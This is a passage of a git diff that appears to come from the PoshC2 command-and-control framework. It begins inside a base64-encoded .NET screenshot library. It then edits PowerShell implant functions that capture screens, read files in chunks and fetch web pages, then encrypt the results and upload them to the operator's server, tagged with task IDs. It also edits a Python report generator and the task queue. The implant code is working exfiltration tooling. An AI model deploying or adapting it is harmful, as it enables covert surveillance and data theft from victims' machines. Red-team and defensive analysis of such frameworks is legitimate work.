QClBAAAAQClBAAAAgC7AAAAAwCgAwAAAQDwAAAAAgCzBgAAAwB8BgAAAQD1AAAAAQDwAAIAAgDmAAAAAQAfBgAAAgD6AAAAAQDiAwAAAgCgAwAAAQDiAwAAAgCgAwAAAwBoAwAABAAfBgAAAQBqBgAAAQAfBgAAAgD6AAAAAQDLBAAAAgCgAwAAAQDLBAAAAgCgAwAAAwBoAwAABAAfBgAAAQBqBgAAAQAfBgAAAgD6AAAAAQDwAAAAAgCgAwAAAQDwAAAAAgCgAwAAAwBoAwAABAAfBgAAAQBqBgkA8AQBABEA8AQGABkA8AQKACkA8AQQADEA8AQQADkA8AQQAEEA8AQQAEkA8AQQAFEA8AQQAFkA8AQQAGEA8AQVAGkA8AQQAHEA8AQQAIkAQwMkAIkAOgYkAIkAKwYkAIkAgQQkAMEAbwQoAIkAHgc5AJEAmAU9AJEAIwVDAJEAggBDAIkA0QNIAIEA8ARXAMkAAQFdAMkArgBkAMkAowBoAHkA8AQGAAgABAB/AAgACACEAAgADACJAAkAEACOAC4ACwBnAS4AEwBwAS4AGwCPAS4AIwCYAS4AKwCoAS4AMwCoAS4AOwCoAS4AQwCYAS4ASwCuAS4AUwCoAS4AWwCoAS4AYwDGAS4AawDwAUEAkwBhAJUAGgAuAFEAcQOGA3sDAQAAAQMAVgYBAAABBQBYBAEAAAEHABEAAQAAAQkALgABAAABCwD9BQEAAAENANkGAgAAAQ8AQQACAAABEQAkAAIAAAETABIGAQBAARsAzgYCAEABHQABBwIAAAEfADsAAgAAASEA7wUCAEABIwDqBgMAAAEnAP8EAgAAASkApwUCAAABKwAuBAIARgEtAAQEAgAAAS8A8QMCAEABMQC6BQIAQAEzAK4EAgBAATUAugQCAAABNwCYBAIAAAE5ANwFAgBAATsAFgQEAEABPQDABgIAAAE/ACEBAgAAAUEA1wACAASAAAABAAAAAAAAAAAAAAAAAIYGAAACAAAAAAAAAAAAAABtAJIAAAAAAAIAAAAAAAAAAAAAAHYANAMAAAAAAgAAAAAAAAAAAAAAbQCDBQAAAAADAAIABAACAAUAAgAGAAIAAAAAdXNlcjMyADxNb2R1bGU+AENyZWF0ZUNvbXBhdGlibGVEQwBSZWxlYXNlREMARGVsZXRlREMAaERDAEdldERDAEdldFdpbmRvd0RDAE1BWElNVU1fQUxMT1dFRABXSU5TVEFfQUxMX0FDQ0VTUwBDQVBUVVJFQkxUAFNSQ0NPUFkAZ2V0X1dvcmtpbmdBcmVhAG1zY29ybGliAGhEYwBhYmMAUmVsZWFzZUhkYwBHZXRIZGMAaGRjAGxwRW51bUZ1bmMAblhTcmMAbllTcmMAaGRjU3JjAEdldFdpbmRvd1RocmVhZFByb2Nlc3NJZABoV25kAGh3bmQAbWV0aG9kAEZyb21JbWFnZQBFbmRJbnZva2UAQmVnaW5JbnZva2UASXNXaW5kb3dWaXNpYmxlAFdpbmRvd0hhbmRsZQBoYW5kbGUAUmVjdGFuZ2xlAERlc2t0b3BOYW1lAGxwQ2xhc3NOYW1lAGxwV2luZG93TmFtZQBuYW1lAFZhbHVlVHlwZQBDYXB0dXJlAEVudW1XaW5kb3dTdGF0aW9uc0RlbGVnYXRlAEVudW1EZXNrdG9wc0RlbGVnYXRlAEVudW1EZXNrdG9wV2luZG93c0RlbGVnYXRlAE11bHRpY2FzdERlbGVnYXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3lzdGVtLkRyYXdpbmcAZ2V0X1dpZHRoAG5XaWR0aAB3aWR0aABBc3luY0NhbGxiYWNrAGNhbGxiYWNrAGdkaTMyLmRsbABVc2VyMzIuZGxsAHVzZXIzMi5kbGwAU2NyZWVuc2hvdC5kbGwAbFBhcmFtAFN5c3RlbQBCb3R0b20AU2NyZWVuAENhcHR1cmVSZWdpb24AcmVnaW9uAFVuaW9uAHdpblN0YXRpb24Ad2luZG93c1N0YXRpb24AQ2xvc2VXaW5kb3dTdGF0aW9uAE9wZW5XaW5kb3dTdGF0aW9uAEdldFByb2Nlc3NXaW5kb3dTdGF0aW9uAFNldFByb2Nlc3NXaW5kb3dTdGF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAENyZWF0ZUNvbXBhdGlibGVCaXRtYXAARnJvbUhiaXRtYXAAZHdSb3AAZ2V0X1RvcABDYXB0dXJlRGVza3RvcABDbG9zZURlc2t0b3AAaERlc2t0b3AAT3BlbkRlc2t0b3AAT3BlbklucHV0RGVza3RvcABkZXNrdG9wAFN0cmluZ0J1aWxkZXIAaHduZENoaWxkQWZ0ZXIALmN0b3IAR3JhcGhpY3MAR2V0U3lzdGVtTWV0cmljcwBTeXN0ZW0uRGlhZ25vc3RpY3MAZ2V0X0JvdW5kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBuRmxhZ3MAU3lzdGVtLldpbmRvd3MuRm9ybXMAZ2V0X0FsbFNjcmVlbnMARW51bVdpbmRvd1N0YXRpb25zAEVudW1EZXNrdG9wcwBscHN6Q2xhc3MAbmVlZEFjY2VzcwBFbnVtRGVza3RvcFdpbmRvd3MAR2V0V2luZG93UmVjdABEZWxldGVPYmplY3QAaE9iamVjdABTZWxlY3RPYmplY3QAb2JqZWN0AHJlY3QAZ2V0X0xlZnQAUmlnaHQAZ2V0X0hlaWdodABuSGVpZ2h0AGZJbmhlcml0AEJpdEJsdABJQXN5bmNSZXN1bHQAcmVzdWx0AGh3bmRQYXJlbnQAbk1heENvdW50AFNjcmVlbnNob3QAaGRjRGVzdABueERlc3QAbnlEZXN0AFN5c3RlbS5UZXh0AGxwV2luZG93VGV4dABHZXRXaW5kb3dUZXh0AEZpbmRXaW5kb3cAR2V0RGVza3RvcFdpbmRvdwBQcmludFdpbmRvdwBscHN6V2luZG93AEZpbmRXaW5kb3dFeAB3b3JraW5nQXJlYU9ubHkARW1wdHkAAAAAAMgUTmDMAYJGtc9up0YeCB0ABCABAQgDIAABBSABARERBCABAQ4EIAEBAgkHBhgYGBgYEkEDIAAIBQABEkEYCgcEEUUdEkkIEkkDBhFFBQAAHRJJBCAAEUUIAAIRRRFFEUUFBwIRDBgFIAIBCAgGAAESZRJhAyAAGAQgAQEYCLd6XFYZNOCJCLA/X38R1Qo6BCAAzAAEAAAAQAQAAAACBH8DAAABAgEWAgYIAgYJDAAJAhgICAgIGAgICAYAAxgYCAgEAAEYGAMAABgFAAICGBgFAAIYGBgGAAESQRFFBAAAEkEFAAESQQIFAAIYDg4HAAQYGBgODgcAAhgYEBEMBgADAhgYCQQAAQgIBgACAhIQGAQAAQIYBgADGA4CCQcAAwIYEhQYBwAEGA4JAgkGAAMYCQIJBwADAhgSGBgHAAMIGBJNCAYAAhgYEBgFIAIBHBgFIAICDhgJIAQSWQ4YEl0cBSABAhJZBSACAhgICSAEElkYCBJdHAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAPAQAKU2NyZWVuc2hvdAAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAxNwAAKQEAJDQyNGIyMjY4LTY0MzctNDgyNy1iMDVjLTNmNmMyN2ZjMGY0MgAADAEABzEuMC4wLjAAAAAAAAAAAABJzkZaAAAAAAIAAAAcAQAA7DMAAOwVAABSU0RTbxrdln4JwUiXVZw4MAy/MAEAAABDOlxVc2Vyc1xhZG1pblxzb3VyY2VccmVwb3NcU2NyZWVuc2hvdFxTY3JlZW5zaG90XG9ialxSZWxlYXNlXFNjcmVlbnNob3QucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADA1AAAAAAAAAAAAAEo1AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8NQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAACwDAAAAAAAAAAAAACwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsASMAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAABoAgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAAPgALAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAFMAYwByAGUAZQBuAHMAaABvAHQAAAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4AMAAAAD4ADwABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAUwBjAHIAZQBlAG4AcwBoAG8AdAAuAGQAbABsAAAAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAxADcAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEYADwABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABTAGMAcgBlAGUAbgBzAGgAbwB0AC4AZABsAGwAAAAAADYACwABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAUwBjAHIAZQBlAG4AcwBoAG8AdAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAMAAAAXDUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" @@ -409,11 +413,10 @@ function Get-ScreenshotAllWindows { $bitmap.save($msimage, "bmp") $b64 = [Convert]::ToBase64String($msimage.toarray()) $bitmap.Dispose(); - $ReadCommand = "get-screenshot" - $ReadCommand = Encrypt-String $key $ReadCommand + $eid = Encrypt-String $key $TaskId $send = Encrypt-String2 $key $b64 $UploadBytes = getimgdata $send - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null } catch {} } $error.clear() @@ -446,7 +449,8 @@ function Download-File { param ( - [string] $Source + [string] $Source, + [string] $TaskId ) try { $fileName = Resolve-PathSafe $Source @@ -475,20 +479,18 @@ function Download-File $preNumbers = ($ChunkedByte+$totalChunkByte) $readSize = $bufferSize; $chunkBytes = $str.ReadBytes($readSize); - $ReadCommand = "download-file "+$fullNewname - $ReadCommand = Encrypt-String $key $ReadCommand + $eid = Encrypt-String $key $TaskId $send = Encrypt-Bytes $key ($preNumbers+$chunkBytes) $UploadBytes = getimgdata $send - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null ++$Chunk } until (($size -= $bufferSize) -le 0); } catch { - $Output = "ErrorCmd: " + $error[0] - $ReadCommand = "Error downloading file "+$fullnewname - $ReadCommand = Encrypt-String $key $ReadCommand + $Output = "ErrorDownload: " + $error[0] + $eid = Encrypt-String $key $TaskId $send = Encrypt-String2 $key $output $UploadBytes = getimgdata $send - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null } } function Posh-Delete @@ -755,15 +757,17 @@ try { } } Function Get-Webpage { - param ($url) + param ( + [string] $url, + [string] $TaskId + ) $file = (New-Object System.Net.Webclient).DownloadString($url)|Out-String - $ReadCommand = "download-file web.html" - $ReadCommand = Encrypt-String $key $ReadCommand + $eid = Encrypt-String $key $TaskId $bytes = [System.Text.Encoding]::UTF8.GetBytes($file) $base64 = [Convert]::ToBase64String($bytes) $Output = Encrypt-String2 $key $base64 $UploadBytes = getimgdata $Output - (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null + (Get-Webclient -Cookie $eid).UploadData("$Server", $UploadBytes)|out-null } Function AutoMigrate { if (($p = Get-Process | ? {$_.id -eq $pid}).name -eq "powershell") { diff --git a/OfflineReportGenerator.py b/OfflineReportGenerator.py index 5a2351e..07b9e08 100644 --- a/OfflineReportGenerator.py +++ b/OfflineReportGenerator.py @@ -204,7 +204,7 @@ function SearchTask() { function tweakMarkup(){ // Add classes to columns - var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'prompt','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] + var classes = ['id', 'Label', taskid', 'randomuri', 'command', 'output', 'user','ImplantID','RandomURI','User','Hostname','IpAddress','Key','FirstSeen','LastSeen','PID','Proxy','Arch','Domain','Alive','Sleep','ModsLoaded','Pivot'] tbl = document.getElementById("PoshTable"); ths = tbl.getElementsByTagName("th"); for( i=0; i'; td.onclick = toggleHide @@ -327,7 +327,7 @@ table { table tr th.randomuri { width: 15%; } - table tr th.prompt { + table tr th.user { width: 10%; } @@ -349,7 +349,7 @@ __________ .__. _________ ________ """ - if table == "CompletedTasks": + if table == "Tasks": HTMLPre += """ @@ -366,13 +366,13 @@ __________ .__. _________ ________ frame = pd.read_sql_query("SELECT * FROM %s" % table, conn) # encode the Output column - if table == "CompletedTasks": + if table == "Tasks": for index, row in frame.iterrows(): frame.loc[index, "Command"] = replace_tabs(cgi.escape(row["Command"])) frame.loc[index, "Output"] = replace_tabs(cgi.escape(row["Output"])) # convert the random uri to original hostname - if table == "CompletedTasks": + if table == "Tasks": framelen = frame['RandomURI'].count() for x in range(0, framelen): try: @@ -398,7 +398,7 @@ __________ .__. _________ ________ HTMLPost = HTMLPost.replace("RandomURI","RandomURI") HTMLPost = HTMLPost.replace("Command","Command") HTMLPost = HTMLPost.replace("Output","Output") - HTMLPost = HTMLPost.replace("Prompt","Prompt") + HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("ImplantID","ImplantID") HTMLPost = HTMLPost.replace("User","User") HTMLPost = HTMLPost.replace("Hostname","Hostname") @@ -422,7 +422,7 @@ tweakMarkup(); output_file.close() print reportname -generate_table("CompletedTasks") +generate_table("Tasks") generate_table("C2Server") generate_table("Creds") generate_table("Implants") diff --git a/Tasks.py b/Tasks.py index 8749a4e..a5850ad 100644 --- a/Tasks.py +++ b/Tasks.py @@ -15,6 +15,7 @@ def newTask(path): if RandomURI in path and tasks: for a in tasks: command = a[2] + user_command = command hostinfo = DB.get_hostinfo(RandomURI) now = datetime.datetime.now() print Colours.YELLOW,"" @@ -47,11 +48,17 @@ def newTask(path): except Exception as e: print "Cannot find module, loadmodule is case sensitive!" print e + taskId = DB.insert_task(RandomURI, user_command, None) + if len(str(taskId)) > 5: + raise ValueError('Task ID is greater than 5 characters which is not supported.') + taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId) + command = taskIdStr + command if commands: commands += "!d-3dion@LD!-d" + command else: commands += command DB.del_newtasks(str(a[0])) + if commands is not None: multicmd = "multicmd%s" % commands